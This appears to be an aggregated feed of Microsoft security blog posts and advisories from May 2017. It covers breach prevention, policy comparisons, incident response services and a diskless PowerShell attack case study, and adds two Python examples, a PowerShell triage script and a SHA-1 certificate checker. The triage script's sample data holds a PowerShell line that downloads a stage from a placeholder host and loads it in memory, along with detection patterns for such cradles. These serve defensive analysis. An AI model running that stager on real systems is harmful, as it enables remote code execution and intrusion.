Simple steps to help prevent data breaches at your company

Every company has cybersecurity risks and needs to be aware of them, but understanding your company’s risk profile is just the beginning.

Watch this Modern Workplace episode “Cyber Intelligence: Help Prevent a Breach” to get advice on how to best approach cybersecurity at your company from two Chief Information Security Officers (CISO) – Vanessa Pegueros, CISO at DocuSign, and Mike Convertino, CISO at F5 Networks. Learn how these seasoned security executives make decisions on security spending and how they justify security investments to skeptical executives who may not have ever experienced a security breach.

Knowing what you need to protect is a key component of your security strategy. As Convertino explains, “The value proposition of the company needs to be the thing that you base your protections and recommendations on.” When you have a clear goal for security, it becomes easier to demonstrate the value of your security investments in tools and talent.

You’ll also see a preview of the protection available from Office 365 Threat Intelligence, which lets you monitor and protect against risks before they hit your organization. Using Microsoft’s global presence to provide insight into real-time security threats, Office 365 Threat Intelligence enables you to quickly and effectively set up alerts, dynamic policies, and security solutions for potential threats.

Watch the Modern Workplace episode to learn more.


Categories: Uncategorized Tags:

7 types of highly effective hackers (and what to do about them)

Would you know what to do if you drew the attention of a hacktivist group? Knowing that damages from a hacktivist attack are typically minor is no relief, as a breach will surely damage your reputation. However, knowing about the different types of hackers, what motivates them, and the tools and techniques they use, can help better prepare your organization to protect against them.

Attacks on organizations around the world are on the rise. Millions of dollars of intellectual property are at risk, as well as the threat of lost productivity. Threats now come from a wide range of sources including:

  • Script Kiddies who exploit existing code to hack for fun
  • Hacking Groups that work together to attack governments and companies
  • Hacktivists who use hacking skills to promote an agenda
  • Black Hat Professionals who make a living from hacking
  • Organized Criminal Gangs that steal data to make money
  • Nation States that do political and economic espionage
  • Cyberweapons Dealers who sell exploits to other hackers

Learn more about the 7 different hackers and get recommendations on how you can better prepare your organization against their potential threats in this free eBook: 7 Types of Highly Effective Hackers.



More than just an ocean separates American and European approaches to cybersecurity

May 17th, 2017

The recent revision of the National Institute of Standards and Technology’s (NIST) Cybersecurity Framework and the publication of the European Union Agency for Network and Information Security’s (ENISA) proposals on implementation of the Network and Information Security (NIS) Directive have made me pause and ponder the progress made (or indeed not) in securing our critical infrastructures since they were both introduced. I was also struck by how much the differences in political culture affect policy outcomes, even when these are largely supported by the broad ecosystems they seek to regulate and/or influence.

The starting point was strikingly similar for both economic powers: the Directive and the Framework seek to improve cybersecurity of critical infrastructures. They came out at around the same time in early 2013, when the European Commission first introduced the Directive and when Obama signed the Executive Order that set out the process that ultimately resulted in the Cybersecurity Framework.

Given the considerable differences between the US and EU political, legislative and executive “machines”, it is no surprise that, even with these common starting points, the two have followed very different paths. The Framework is undergoing its first major revision in 3 years based on changes in threat and the experiences of global adopters. The Directive is only now beginning the implementation phase in the EU member states.

NIST’s creation of the Framework has been rightly held up as a successful example of public-private partnership. It used an open, collaborative and iterative development process to harness the expertise and experience of cyber and non-cyber stakeholders, hosting numerous open workshops and consulting widely, and not just within the US itself. The result was a Framework that is now being referenced around the world by businesses and governments, and it is being considered as a starting point for ISO 27103.

On the other hand, the processes of aligning 28 different sets of national cybersecurity agendas, and of securing a common view from a European Parliament that has somewhere between four and six major party groups, took considerably longer than the gestation of the Framework. It was a monumental effort and investment on the part of Europe. There were working groups and workshops too, but perhaps because of the efforts to coordinate the necessary agreements at the “top”, the resulting Directive lacked some of the obvious “bottom-up” characteristics of the Framework. But the benefit of the Directive is that it creates durable institutions in EU member states, coordination processes, and security baselines. As a result, it is likely to produce a very different return on investment than the Framework.

But this should not just be a story of different approaches to cybersecurity policy. The EU approach to building institutions and setting capability requirements, if implemented and evolved, will help provide a layer of coordination and security that did not exist before. The Framework’s voluntary nature and global adoption are better at preparing enterprises – public and private – to improve their risk management measures.

From the perspective of both businesses and regulators, these are substantial differences between the two approaches. However, in the end they may complement each other more than we see today. For example, several EU member states already reference the Framework within their approaches to cybersecurity as they seek to reuse its implementing terminology and standards. Looking forward, therefore, it is possible that the two approaches could converge in practical ways. Parts of the Framework might evolve into an international standard, as referenced above, one that can be utilized by a great number of countries. Equally, the implementation of the Directive at EU member state level, and the identification of reference standards, could establish a model that other regions might follow.

Cybercriminals and cyberattacks will inevitably be encouraged and enabled by serious divergence in approaches to cybersecurity, wherever in the world these occur. As such, it seems essential that steps are taken on both sides of the Atlantic to ensure closer harmonization, both to improve the situation of the US and the EU and to set an example to the rest of the world.


Announcing new Adversary Detection and Compromise Recovery services

This post is authored by Berk Veral, Senior Marketing Communication Manager, Enterprise Cybersecurity Group. 

Perhaps one of the best-kept secrets within Microsoft cybersecurity services is the Global Incident Response and Recovery team.  We affectionately call them the “GIRR” team for short. Not many people know about the team but, for those whom they have helped to combat cyber criminals, they are indispensable – a trusted partner when the worst cybercrimes happen.

The GIRR team is composed of elite cybersecurity professionals who are experts in handling critical incidents and helping our customers during a crisis when a compromise or a breach is suspected. On an ongoing basis, the team works around the clock and around the globe, demonstrating grit, fortitude and steadfast dedication to Microsoft customers in need.

The team is expanding and now offers two new services for our customers: Persistent Adversary Detection Services – Cloud Enabled (PADS-CE) and Compromise Recovery (CR). These are two very different standalone services designed to help customers under specific circumstances.

Cloud-Based Persistent Adversary Detection Service

PADS-CE is a cybersecurity service for customers who want to understand their exposure to the risks posed by today’s targeted attacks from determined human adversaries and sophisticated criminal organizations. However, unlike a traditional PADS engagement where all resources would be deployed onsite at the customer’s location, PADS-CE leverages a secure Azure workspace for collaboration, allowing remote team members to participate in the engagement. PADS-CE provides the ability to leverage the unique skill sets of seasoned Incident Responders worldwide, culminating in a richer engagement experience and output for our customers.

PADS-CE is ideal for enterprise customers primarily running Windows endpoints who would like to validate that they have not been the victim of a targeted attack. It is a proactive, discreet service that is, in effect, an incident response conducted before an actual emergency.

Microsoft will provide information regarding the customer’s exposure to targeted attacks via PADS-CE at a lower price point by leveraging Azure and a team of remote resources. PADS-CE leverages telemetry from Microsoft’s vast, global sensor network, and is able to correlate PADS-CE findings against threat intelligence worldwide. The team uses proprietary scanners (which do not remain on the network) to detect the presence of implants, backdoors, and similar unauthorized malicious code. Through forensic analysis and reverse engineering of any implants found, the team can assess customers’ current exposure to the threats posed by targeted attacks.

Compromise Recovery

The Microsoft Compromise Recovery (CR) service is a cybersecurity offering designed to restore a customer’s secure business operations after a compromise. The service runs in parallel with any ongoing incident response investigation or soon after its completion, whether performed by Microsoft or a third party.

It consists of four principal components:

  1. Scoping of the compromise
  2. Installing critical hardening policies
  3. Deploying and tuning tactical monitoring solutions
  4. Coordinating an attacker eviction event

CR is ideal for enterprise customers primarily running Windows endpoints who have confirmed malicious activity in their environment. Most likely, they have already engaged Microsoft or a third party to complete an incident response investigation.

CR will help customers get their business operations back up and running by remediating their exposure to risks after an incident response investigation. CR will remove identified malicious activity from their network, harden against further compromise and monitor for indicators of compromise based on the current attack.

In addition to restoring a customer’s secure business operations and providing information regarding the customer’s remaining risk exposure, CR will offer suggestions for strategic initiatives to improve security posture. Microsoft leverages best-in-class monitoring solutions – Advanced Threat Analytics (ATA) and Operations Management Suite (OMS) – to monitor systems after a compromise. Compromise Recovery is based on years of industry expertise and best practices in incident response, built on the Microsoft GIRR team successfully leading countless recoveries around the globe.

Trusted Security Partner Every Step of the Way

These two offerings bring Microsoft customers expanded capabilities in cybersecurity, and provide the Microsoft Global Incident Response and Recovery team another tool to ensure Microsoft can be counted on by every enterprise CISO as their trusted security partner when it comes to detecting and responding to incidents, as well as getting business operations back up and running in the wake of an incident.

Please visit Sharing Microsoft learnings from major cybersecurity incidents to learn more about the Microsoft Global Incident Response and Recovery team and how they can help your organization.


How the Asia-Pacific region is advancing cybersecurity

This post is authored by Angela McKay, Director of Cybersecurity Policy.

Earlier this year, my team and I had the great privilege and pleasure of spending several days in Japan, participating in the Information Technology Promotion Agency (IPA) Symposium. We also met with industry colleagues to discuss global cybersecurity trends and opportunities to engage in public policy, and met with Japanese government partners to examine the question of cloud security.

Even just a few days in Tokyo demonstrated that the focus on the importance of cybersecurity is growing in Japan and across the Asia-Pacific region, within both government and industry. The understanding that concrete action is now needed is also growing.

Japan is well positioned for regional leadership in this space. The size of the IPA symposium, the seniority of both attendees and speakers, and the maturity of the conversation underscored this. In Japan, cybersecurity is clearly evolving from an issue of interest solely to technically inclined geeks, to one that is a major concern for the government, businesses, and consumers. The policy debate is shifting from conceptual discussions to more practical consideration, such as the development of security practices and requirements, particularly for critical infrastructure and government.

What is particularly praiseworthy and unique in the Japanese approach is the iterative way the government is tackling challenges in this space, dynamically reprioritizing and emphasizing different areas based on changes in technology and risks, and on the effectiveness of its various efforts. For example, while the Basic Cybersecurity Law and National Cybersecurity Strategy were adopted more than two years ago, the government has since repeatedly consulted and reexamined areas where outcomes have proven difficult to attain, for example cross-government cooperation on cybersecurity.

Japan is not alone in grappling with how to govern cybersecurity; however, it is one of the few governments that understands that cybersecurity is not an area that can be looked at once and then ignored for the next decade. It is using the impetus behind the 2020 Olympics and Paralympics to increase cyber resilience, examining how new technologies, such as cloud computing, can increase the security of the government, critical infrastructures, and the Internet of Things (IoT). It actively seeks to assess progress with 2020 in mind, for example by considering whether and how cybersecurity information sharing is increasing the security of the Games and key sectors of the economy. It does this not just through forming ISACs but by partnering with the private sector to ensure that 1) sharing is focused on risk management outcomes and 2) cultural and structural obstacles that might be particular to Japan are understood and addressed.

A similar approach is being pursued when it comes to encouraging critical infrastructure sectors to adopt risk management practices. The government has been consulting on its guide, as it realizes that while the voluntary nature of its cybersecurity efforts remains pivotal, many private sector enterprises are looking for more specific guidance on how to move forward in this area. In our response, Microsoft therefore suggested developing a model similar to the one put forward by NIST with its Cybersecurity Framework, where the government and private sector collaborated to develop guidance that built on proven standards and best practices within an overarching framework that is meaningful to executives.

Beyond this pragmatic approach, Japan also continues to drive thought leadership in important new areas. Japan recently announced a new partnership with Germany to establish an Internet of Things (IoT) standard for commercial and industrial organizations, as well as proposals on how to best secure this new area of innovation. This has given Japan a unique opportunity, perhaps even a responsibility as a genuine world leader in this space, to start articulating the security concerns that should be addressed by players in IoT services (with a link to our NTIA response for more detail). Their solutions, including the use of incentives to drive behaviors, will be looked at by other governments, not just regionally but across the globe.

In the era of digitalization, every government and organization should look to, incorporate and codify effective initiatives and programs, such as Japan’s, into their policies and operations. Microsoft is excited to work alongside Japan and other Asia-Pacific countries to build a global culture of strong cybersecurity principles that create a trustworthy high-tech world. It will require the leadership of countries such as Japan and the commitment of industry leaders such as ourselves to ensure safety and security in the digital space.


4022345 – Identifying and correcting failure of Windows Update client to receive updates – Version: 1.3

Severity Rating: Critical
Revision Note: V1.3 (May 12, 2017): Updated FAQ to clarify the update that needs to be installed: “the current cumulative update”. This is an informational change only.
Summary: Microsoft is releasing this security advisory to provide information related to an uncommon deployment scenario in which the Windows Update Client may not properly scan for, or download, updates.



4021279 – Vulnerabilities in .NET Core, ASP.NET Core Could Allow Elevation of Privilege – Version: 1.1

Revision Note: V1.1 (May 10, 2017): Advisory revised to include a table of issue CVEs and their descriptions. This is an informational change only.
Summary: Microsoft is releasing this security advisory to provide information about vulnerabilities in the public .NET Core and ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications correctly.



Use Enterprise Threat Detection to find “invisible” cyberattacks

This post is authored by Roberto Bamberger, Principal Consultant, Enterprise Cybersecurity Group.

Amongst the plethora of stories about cyberattacks in the news, multiple recent articles have described the harder-to-detect cyberattacks that leverage normal tools, already present in an enterprise, to achieve their mission. Securelist calls the techniques used in these situations “invisible” and “diskless”. This post describes the challenges your organization can face in detecting such attacks with typical detection techniques and what you can do to protect against them.

To begin, consider that many of these attacks use native capabilities in Microsoft Windows such as PowerShell in order to avoid having to store files on disks which are routinely scanned and could be discovered by antivirus products. That is why Microsoft has developed multiple capabilities that can detect such attacks including:

  1. Microsoft Enterprise Threat Detection
  2. Windows Defender Advanced Threat Protection
  3. Microsoft Advanced Threat Analytics

Here is a summary of why these can help you.

The Microsoft Enterprise Threat Detection (ETD) service is a managed detection service able to detect invisible/diskless attacks and provide enterprises with actionable intelligence to respond effectively to these threats. Windows 10 also includes Windows Defender Advanced Threat Protection (Windows Defender ATP). This feature, along with the Antimalware Scan Interface (AMSI) and Microsoft Advanced Threat Analytics (ATA), provides you with user and entity behavioral analysis capabilities which can be effective in detecting such threats and their associated malicious behaviors.

Enterprise Threat Detection can consume a variety of data sources:

  • Windows error reports can contain memory of a faulting process, registry keys, files, and the results of WMI queries
  • Telemetry sent from the organization’s IP egress ranges in the form of the Microsoft Active Protection System (MAPS)
  • Data received by the Microsoft Digital Crimes Unit as part of its botnet disruption and eradication efforts
  • ATA and Windows Defender ATP on Windows 10, which monitor those signals and provide advanced detection and response data

To illustrate leveraging the Windows Error Reporting data for this type of advanced analysis, the Microsoft ETD team recently received an event from a customer environment, which was due to a crash in PowerShell.

In this case, PowerShell was executing an object stored in a base64-encoded string. Automated analysis of the memory of the PowerShell process indicated that it contained code consistent with malicious shellcode.

Further analysis revealed that the code being reflectively loaded into the PowerShell process attempted to download additional code from an external source. Using advanced analysis tools, ETD analysts determined the name of the server and the file that was being requested.

Analysis of the payload returned from this internet resource revealed that the attacker was establishing a reverse shell and loading the Metasploit Meterpreter, a popular penetration testing tool. However, the Meterpreter code was never written to disk as a file; it was diskless, loaded only from an external site, which made detection within the customer environment difficult.

Microsoft ETD analysts quickly analyzed the event, determined it was malicious, and informed the organization of the nature of the attack, providing them with actionable intelligence. This specific actionable intelligence included indicators of attack that can be used to analyze additional data such as proxy logs, to determine if this activity was still ongoing and/or impacting other machines in their environment.
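The triage the post describes, as an added example that is not the post's own code nor part of the ETD service: decode a PowerShell `-EncodedCommand` argument found in a process-creation record (base64 over UTF-16LE), flag the decoded text when it shows reflective loading or a download cradle, extract the contacted URL as an indicator, and pivot into proxy logs to find other machines that reached the same host. The log line shapes, the `.invalid` hostnames and the pattern list are constructed assumptions for illustration, not a published rule set.

```python
import base64
import re
from typing import NamedTuple
from urllib.parse import urlparse

# Strings whose presence in a decoded PowerShell command suggests in-memory
# ("diskless") staging rather than routine administration. Illustrative
# assumption only; a production rule set would be broader and tuned.
SUSPICIOUS_PATTERNS = {
    "reflective-load": re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.I),
    "download-cradle": re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|\bIEX\b|Invoke-Expression", re.I),
    "nested-base64": re.compile(r"FromBase64String", re.I),
    "memory-alloc": re.compile(r"VirtualAlloc|CreateThread", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


class Finding(NamedTuple):
    host: str
    command: str   # decoded command text that triggered the finding
    hits: tuple    # names of the patterns that matched
    urls: tuple    # URLs referenced by the command (candidate indicators)


def encode_command(script: str) -> str:
    """Encode a script as PowerShell expects for -EncodedCommand: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the plaintext behind an -EncodedCommand (or -e/-ec/-enc) argument, else None."""
    m = re.search(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_process_log(lines):
    """Scan process-creation lines ('<ts> <host> <event id> <command line>') for suspicious PowerShell use."""
    findings = []
    for line in lines:
        _ts, host, _event_id, cmdline = line.split(None, 3)
        if "powershell" not in cmdline.lower():
            continue
        decoded = decode_encoded_command(cmdline)
        text = cmdline if decoded is None else decoded     # inspect the decoded script when present
        hits = tuple(name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text))
        if hits:
            findings.append(Finding(host, text, hits, tuple(URL_RE.findall(text))))
    return findings


def hosts_contacting(proxy_lines, indicator_hosts):
    """Return client hosts whose proxy entries ('<ts> <client> <method> <url> <status>') reach an indicator host."""
    clients = set()
    for line in proxy_lines:
        _ts, client, _method, url, _status = line.split()
        if urlparse(url).hostname in indicator_hosts:
            clients.add(client)
    return clients


# Constructed sample data (not real customer telemetry). The first line mimics the
# scenario in the post: a hidden PowerShell that downloads bytes and loads them reflectively.
STAGER = ("$b = (New-Object Net.WebClient).DownloadData('http://stager.example.invalid/stage2'); "
          "[Reflection.Assembly]::Load($b)")
BENIGN = "Get-Service | Where-Object { $_.Status -eq 'Running' } | Export-Csv C:\\temp\\services.csv"
PROCESS_LOG = [
    f"2017-05-09T10:15:01Z WS-0042 4688 powershell.exe -NoP -W Hidden -EncodedCommand {encode_command(STAGER)}",
    f"2017-05-09T10:16:44Z WS-0007 4688 powershell.exe -EncodedCommand {encode_command(BENIGN)}",
    "2017-05-09T10:17:02Z WS-0007 4688 notepad.exe C:\\Users\\admin\\notes.txt",
]
PROXY_LOG = [
    "2017-05-09T10:15:03Z WS-0042 GET http://stager.example.invalid/stage2 200",
    "2017-05-09T10:15:05Z WS-0099 GET http://stager.example.invalid/stage2 200",
    "2017-05-09T10:15:09Z WS-0007 GET http://updates.example.invalid/catalog 200",
]


def triage():
    """Flag suspicious PowerShell, derive indicator hosts, then pivot into the proxy log."""
    findings = analyze_process_log(PROCESS_LOG)
    indicator_hosts = {urlparse(u).hostname for f in findings for u in f.urls}
    affected = hosts_contacting(PROXY_LOG, indicator_hosts)
    return findings, sorted(indicator_hosts), sorted(affected)


if __name__ == "__main__":
    results, indicators, contacted = triage()
    for f in results:
        print(f"{f.host}: {', '.join(f.hits)} -> {f.command}")
    print("indicator hosts:", indicators, "| hosts that contacted them:", contacted)
```

The benign encoded command (an administrator exporting a service list) decodes cleanly but matches nothing, while the staging command is flagged on two patterns and yields the host `stager.example.invalid`; the proxy pivot then shows that a second workstation, which never appeared in the process log, fetched the same resource. That pivot is the "additional data such as proxy logs" step the post describes, and it is the reason an indicator is worth more than a single alert.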

In conclusion, organizations need to be aware of this type of malicious behavior becoming more prevalent in cybercrime. Microsoft has many insights and tools for enterprises to help keep their environments protected. For information about Enterprise Threat Detection services, contact your Microsoft Account Team or email mtds@microsoft.com.


MS17-013 – Critical: Security Update for Microsoft Graphics Component (4013075) – Version: 3.0

Severity Rating: Critical
Revision Note: V3.0 (May 9, 2017): Microsoft has re-released security update 4017018 for affected editions of Windows Server 2008. The re-release has been re-classified as a security update. Microsoft recommends that customers should install update 4017018 to be fully protected from CVE-2017-0038. Customers who have already installed the update do not need to take any further action. In addition, this security update correction also applies to Windows Server 2008 for Itanium-based Systems.
Summary: This security update resolves vulnerabilities in Microsoft Windows, Microsoft Office, Skype for Business, Silverlight and Microsoft Lync. The most serious of these vulnerabilities could allow remote code execution if a user either visits a specially crafted website or opens a specially crafted document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.


MS17-MAR – Microsoft Security Bulletin Summary for March 2017 – Version: 3.0


4010323 – Deprecation of SHA-1 for SSL/TLS Certificates in Microsoft Edge and Internet Explorer 11 – Version: 1.0

Revision Note: V1.0 (May 9, 2017): Advisory published.
Summary: Beginning May 9, 2017, Microsoft released updates to Microsoft Edge and Internet Explorer 11 to block sites that are protected with a SHA-1 certificate from loading and to display an invalid certificate warning. This change will only impact SHA-1 certificates that chain to a Microsoft Trusted Root CA where the end-entity certificate or the issuing intermediate uses SHA-1. Manually-installed enterprise or self-signed SHA-1 certificates will not be impacted, although we recommend that all customers quickly migrate to SHA-2. For more information, please see Windows Enforcement of SHA1 Certificates.
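The inventory check a practitioner would want before this enforcement lands, as an added example that is not part of the advisory: read the signature algorithm OID straight out of a DER-encoded certificate with a minimal ASN.1 reader (no third-party library), and report which members of a chain, leaf first, are SHA-1 signed. The advisory only counts the end-entity and issuing intermediates, so the self-signed root is skipped by default. The OIDs are the standard ones; the DER helpers and the skeleton certificates they build for the demonstration are my own construction and carry no real subject, issuer or signature.

```python
import base64
import ssl

# Signature-algorithm OIDs that denote a SHA-1 signature (standard values).
SHA1_SIGNATURE_OIDS = {
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
    "1.2.840.10045.4.1": "ecdsa-with-SHA1",
    "1.2.840.10040.4.3": "dsa-with-sha1",
}


def _read_tlv(buf: bytes, pos: int):
    """Read one DER tag-length-value at buf[pos]; return (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _decode_oid(raw: bytes) -> str:
    """Decode OBJECT IDENTIFIER content bytes to dotted form (first arc 0, 1 or 2)."""
    arcs, value = [], 0
    for b in raw:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:                   # high bit clear: last byte of this arc
            arcs.append(value)
            value = 0
    return ".".join(str(a) for a in [arcs[0] // 40, arcs[0] % 40] + arcs[1:])


def signature_algorithm_oid(der: bytes) -> str:
    """Dotted OID of the outer signatureAlgorithm of a DER X.509 certificate."""
    tag, cert, _ = _read_tlv(der, 0)       # Certificate ::= SEQUENCE { tbs, sigAlg, sigValue }
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    _, _tbs, pos = _read_tlv(cert, 0)      # tbsCertificate is skipped as a whole
    tag, alg_id, _ = _read_tlv(cert, pos)  # AlgorithmIdentifier ::= SEQUENCE { OID, params OPTIONAL }
    if tag != 0x30:
        raise ValueError("malformed AlgorithmIdentifier")
    tag, oid, _ = _read_tlv(alg_id, 0)
    if tag != 0x06:
        raise ValueError("AlgorithmIdentifier does not begin with an OID")
    return _decode_oid(oid)


def sha1_signed_positions(chain_der, skip_root=True):
    """Indexes of chain members (leaf first) signed with SHA-1; the root is ignored by default."""
    members = chain_der[:-1] if skip_root and len(chain_der) > 1 else chain_der
    return [i for i, der in enumerate(members) if signature_algorithm_oid(der) in SHA1_SIGNATURE_OIDS]


def pem_chain_to_der(pem_text: str):
    """Split a PEM bundle (leaf first, as servers send it) into DER blobs."""
    ders = []
    for chunk in pem_text.split("-----END CERTIFICATE-----"):
        if "-----BEGIN CERTIFICATE-----" in chunk:
            body = chunk[chunk.index("-----BEGIN CERTIFICATE-----"):] + "-----END CERTIFICATE-----"
            ders.append(ssl.PEM_cert_to_DER_cert(body))
    return ders


def der_to_pem(der: bytes) -> str:
    return "-----BEGIN CERTIFICATE-----\n" + base64.encodebytes(der).decode() + "-----END CERTIFICATE-----\n"


# --- Constructed test material: DER Certificate skeletons, not real certificates. ---
def _tlv(tag: int, body: bytes) -> bytes:
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body


def _encode_oid(dotted: str) -> bytes:
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray()
    for v in [arcs[0] * 40 + arcs[1]] + arcs[2:]:
        chunk = [v & 0x7F]
        v >>= 7
        while v:
            chunk.append(0x80 | (v & 0x7F))
            v >>= 7
        out += bytes(reversed(chunk))
    return bytes(out)


def build_test_cert(sig_oid: str) -> bytes:
    """Skeleton with a dummy tbsCertificate and signatureValue; only the AlgorithmIdentifier is meaningful."""
    params = _tlv(0x05, b"") if sig_oid.startswith("1.2.840.113549.1.1.") else b""  # RSA carries NULL params
    tbs = _tlv(0x30, _tlv(0x02, b"\x01"))
    alg = _tlv(0x30, _tlv(0x06, _encode_oid(sig_oid)) + params)
    return _tlv(0x30, tbs + alg + _tlv(0x03, b"\x00" + bytes(8)))
```

For a real chain, `pem_chain_to_der(open("chain.pem").read())` gives the input list; note that `ssl.get_server_certificate((host, 443))` returns only the leaf, so intermediates must be taken from the server's handshake or from a saved bundle. The script reports signature algorithms only; whether the chain terminates in a Microsoft Trusted Root CA, which is what the advisory's enforcement hinges on, is a separate trust-store question.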


4022345 – Identifying and correcting failure of Windows Update client to receive updates – Version: 1.0

Severity Rating: Critical
Revision Note: V1.0 (May 9, 2017): Advisory published.
Summary: Microsoft is releasing this security advisory to provide information related to an uncommon deployment scenario in which the Windows Update Client may not properly scan for, or download, updates.


4021279 – Vulnerabilities in .NET Core, ASP.NET Core Could Allow Elevation of Privilege – Version: 1.0

Revision Note: V1.0 (May 9, 2017): Advisory published.
Summary: Microsoft is releasing this security advisory to provide information about vulnerabilities in the public .NET Core and ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications correctly.

